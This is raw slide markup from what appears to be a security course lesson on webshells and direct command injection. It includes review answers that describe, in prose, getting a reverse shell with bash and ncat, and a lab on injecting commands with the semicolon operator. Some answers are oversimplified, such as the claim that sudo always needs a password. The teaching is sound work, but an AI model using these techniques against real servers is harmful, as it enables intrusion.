          <a:p>
            <a:pPr indent="-330200" lvl="0" marL="457200" marR="152400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>Can you use a webshell to run commands with sudo? Why or why not?</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>No, because sudo requires users to enter a password.</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="152400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="0" marL="457200" marR="152400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>Can you use a webshell to add or modify a user, or change group membership? Why or why not?</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="152400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="152400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="0" marL="457200" marR="152400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>Can you use a webshell to open an interactive shell to an attacking machine? Why or why not?</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="152400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <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8" name="Shape 1108"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1109" name="Google Shape;1109;p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Webshell Warm-Up Review</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1110" name="Google Shape;1110;p6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11" name="Google Shape;1111;p64"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="665950"/>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Thinking Critically</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1112" name="Google Shape;1112;p64"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="64550" y="1163000"/>
            <a:ext cx="9144000" cy="1302600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="914400" lIns="457200" spcFirstLastPara="1" rIns="457200" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-330200" lvl="0" marL="457200" marR="152400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>Can you use a webshell to run commands with sudo? Why or why not?</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:highlight>
                  <a:srgbClr val="FFD966"/>
                </a:highlight>
              </a:rPr>
              <a:t>No, because sudo requires users to enter a password.</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:highlight>
                <a:srgbClr val="FFD966"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="152400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="0" marL="457200" marR="152400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>Can you use a webshell to add or modify a user, or change group membership? Why or why not?</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:highlight>
                  <a:srgbClr val="FFD966"/>
                </a:highlight>
              </a:rPr>
              <a:t>No, because adding/modifying users requires sudo.</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:highlight>
                <a:srgbClr val="FFD966"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="152400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="0" marL="457200" marR="152400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>Can you use a webshell to open an interactive shell to an attacking machine? Why or why not?</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <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6" name="Shape 1116"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1117" name="Google Shape;1117;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Webshell Warm-Up Review</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1118" name="Google Shape;1118;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19" name="Google Shape;1119;p65"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="665950"/>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Thinking Critically</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1120" name="Google Shape;1120;p65"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="64550" y="1163000"/>
            <a:ext cx="9144000" cy="3543000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="914400" lIns="457200" spcFirstLastPara="1" rIns="457200" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="152400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="0" marL="457200" marR="152400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>Can you use a webshell to open an interactive shell to an attacking machine? Why or why not?</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" marR="152400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="609600" marR="190500" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="104347"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:highlight>
                  <a:srgbClr val="FFD966"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Yes and no. (</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1600">
                <a:highlight>
                  <a:srgbClr val="FFD966"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>It depends</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:highlight>
                  <a:srgbClr val="FFD966"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>). </a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:highlight>
                <a:srgbClr val="FFD966"/>
              </a:highlight>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="609600" marR="190500" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="104347"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:highlight>
                  <a:srgbClr val="FFD966"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>In the examples we’ve seen: no. This is because the server runs as the www-data user, which has a default shell of /bin/false or /bin/nologin`, both of which prevent the user from acquiring an interactive shell. </a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:highlight>
                <a:srgbClr val="FFD966"/>
              </a:highlight>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="609600" marR="190500" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="104347"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:highlight>
                  <a:srgbClr val="FFD966"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>However, you could get an interactive shell from www-data by executing a bash reverse shell, catching it with ncat, and using python to get a TTY shell.</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="1600">
              <a:highlight>
                <a:srgbClr val="FFD966"/>
              </a:highlight>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="152400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <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4" name="Shape 1124"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1125" name="Google Shape;1125;p6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Direct Command Injection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1126" name="Google Shape;1126;p6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0" name="Shape 1130"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1131" name="Google Shape;1131;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Command Injection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1132" name="Google Shape;1132;p6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Using a webshell is limited. It requires uploading arbitrary files to the target server, but that is not always possible for applications that expose file upload features. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1133" name="Google Shape;1133;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34" name="Google Shape;1134;p67"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="175" y="1606100"/>
            <a:ext cx="9144000" cy="33003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t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>Servers that don’t expose a file upload feature may still be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>susceptible</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1600"/>
              <a:t>direct command injection. </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1600"/>
              <a:t>Direct command injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t> involves user data, such as a search term sent through a form, is used as part of a shell command. </a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>This is essentially the same scenario as SQL injection, in which user-submitted  data is used to build a database query. </a:t>
            </a:r>
            <a:endParaRPr sz="1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8" name="Shape 1138"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1139" name="Google Shape;1139;p6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40" name="Google Shape;1140;p68"/>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solidFill>
                  <a:srgbClr val="F1C232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Direct Command Injection</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="F1C23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4" name="Shape 1144"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1145" name="Google Shape;1145;p69"/>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1146" name="Google Shape;1146;p6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47" name="Google Shape;1147;p69"/>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: My First Command Injection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latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>In this activity, you will use the semicolon operator to inject commands to a vulnerable serve. </a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Instructions sent via Slack.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1" name="Shape 1151"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1152" name="Google Shape;1152;p7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53" name="Google Shape;1153;p70"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2571750" y="3446775"/>
            <a:ext cx="3980400" cy="85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My First Command Injection</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7" name="Shape 1157"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1158" name="Google Shape;1158;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Command Injection Review</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1159" name="Google Shape;1159;p71"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="675975"/>
            <a:ext cx="9144000" cy="1827000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="457200" spcFirstLastPara="1" rIns="457200" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Submit a valid IP address, such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
